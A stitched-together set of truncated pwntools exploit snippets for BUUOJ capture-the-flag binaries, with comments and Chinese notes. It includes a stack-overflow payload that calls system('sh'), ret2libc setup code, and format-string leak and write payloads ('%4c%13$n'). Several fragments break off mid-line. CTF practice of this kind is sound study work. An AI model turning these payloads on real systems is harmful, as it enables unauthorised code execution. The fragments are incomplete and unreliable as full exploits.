# Excerpt of a pwntools script that talks either to the local binary
# ./ciscn_2019_n_5 or to a remote instance of it. The page cuts the listing
# off after `main_addr =`, so only the setup portion is visible.
from pwn import *
from LibcSearcher import *  # third-party helper, not part of pwntools; star import adds all of its public names

local_file = ('./ciscn_2019_n_5')  # the parentheses are redundant: this is a plain str, not a tuple
select = 1  # 0 starts the binary locally; any other value connects to the remote host
if select == 0:
    r = process(local_file)
else:
    r = remote('node5.buuoj.cn', 27578)
elf = ELF(local_file)  # parsed from the local copy even when the remote target is selected
context.log_level = 'debug'  # pwntools logs every byte sent and received at this level
offset1 = 64
# presumably a 0x20-byte buffer plus an 8-byte saved frame pointer — confirm against the binary
offset2 = 0x20+0x08
# GOT slot and PLT stub of puts, read from the ELF's own tables.
# NOTE(review): usable as absolute addresses only if the binary is not
# position-independent (or elf.address has been set) — verify with checksec.
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
# The trailing "..." is the page's truncation marker, not part of the script;
# the right-hand side of this assignment is not shown.
main_addr =...

from pwn import * # p = process('./ne_5') p = remote("node5.buuoj.cn", 29898) sh = 0x80482ea sys_addr = 0x080484D0 # 使用ROPgadget找 p.sendlineafter("password:", b'administrator') p.sendlineafter(b'0.Exit\n:', b'1') payload = b'a' * (0x48 + 4) + p32(sys_addr) + b'aaaa' + p32(sh) # 使用system函数传参 同时用任意数据填充4个字节的返回地址...

payload3 = b'AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p'
io.sendline(payload3)

看到0x41414141在第11个位置

from pwn import *
#start
r = process("../buu/jarvisoj_fm")
#params
x_addr = 0x804A02C
#attack
payload = b'%4c%13$n' + p32(x_addr)
print(payload)
r.sendline(payload)
r.interactive()

1. p32(x_addr):指定“写入的目标” 含义...

# Excerpt of a pwntools script for a 32-bit Linux target reached over the
# network. Only the setup and the first hard-coded constants are visible; the
# page cuts the listing off after `offset1 = 0x88 + 4`.
from pwn import *
from LibcSearcher import LibcSearcher  # third-party helper, not part of pwntools

# Sets the global pwntools context; log_level='debug' logs every byte sent and received.
context(arch='i386', os='linux', log_level='debug')
io = connect('node5.buuoj.cn',29724) # interact with the online environment
#_______________addresses needed below, including the offset_____________________
# NOTE(review): absolute addresses, so the script assumes a fixed load base
# (no PIE) — verify with checksec. What leak_func points at is not visible
# in this excerpt.
leak_func = 0x08048474
main_addr = 0x080484C6
# presumably a 0x88-byte buffer plus the 4-byte saved frame pointer — confirm against the binary.
# The trailing "..." is the page's truncation marker, not part of the script.
offset1 = 0x88 + 4...